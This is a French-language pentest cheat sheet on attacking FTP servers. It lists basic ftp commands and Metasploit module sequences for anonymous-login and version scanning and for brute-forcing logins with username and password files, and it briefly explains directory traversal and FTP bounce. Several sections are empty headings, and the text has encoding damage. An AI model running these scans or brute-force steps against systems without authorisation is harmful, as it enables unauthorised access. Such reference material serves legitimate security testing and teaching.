FTP - 21
1. Liste de commandes basiques
Connexion Ă un serveur ftp :
ftp <ip>Lister fichiers dans un serveur ftp
ls / dirRécupérer un fichier dans un serveur ftp
get <nom du fichier>2. Exploitation dâun serveur FTP mal configurĂ© avec Metasploit :
msfconsole use auxiliary/scanner/ftp/anonymousmsf auxiliary(anonymous) >set rhosts <ip victime>msf auxiliary(anonymous) >exploit3. Exploitation dâun serveur FTP mal configurĂ© avec Metasploit :
msfconsole use auxiliary/scanner/ftp/ftp_versionmsf auxiliary(anonymous) >set rhosts <ip victime>msf auxiliary(anonymous) >exploit4. FTP sniffing and Brute Force Attack :
msfconsole use auxiliary/scanner/ftp/ftp_loginmsf auxiliary(ftp_login) > set rhosts 192.168.01.106msf auxiliary(ftp_login) > set user_file /root/Desktop/user.txtmsf auxiliary(ftp_login) > set pass_file /root/Desktop/pass.txtmsf auxiliary(ftp_login) > set stop_on_success truemsf auxiliary(ftp_login) > exploit5. Directory Traversal Attack
Une autre vulnĂ©rabilitĂ© FTP inclut les attaques de directory traversal dans lesquelles lâattaque rĂ©ussie Ă©crase ou crĂ©e des fichiers non autorisĂ©s qui sont stockĂ©s Ă lâextĂ©rieur du dossier racine Web.
6. Connexion anonyme
7. Connexion par le navigateur
Vous pouvez vous connecter Ă un serveur FTP Ă l'aide d'un navigateur (comme Firefox) en utilisant une URL comme :
8. Télécharger tous les fichiers à partir du FTP
8. FTP Bounce
Le FTP Bounce signifie Rebond FTP. Câest un cas de spoofing dâadresse IP. Elle est basĂ©e sur une utilisation de la commande PORT du protocole FTP lorsque le serveur FTP est en mode actif. En effet, cette commande permet de se connecter Ă nâimporte quel autre serveur distant, et Ă un port donnĂ©. Dans ce cas, il est possible que la sĂ©curitĂ© du serveur cible soit compromis, dans le cas ou il effectue une vĂ©rification des adresses IP dâorigine. En effet, lâadresse IP que le serveur cible verra sera lâadresse IP du serveur FTP, et non de lâadresse IP de lâattaquant.
Ce petit schéma explique la technique utilisée :
9. Fichiers de configuration
Last updated
Was this helpful?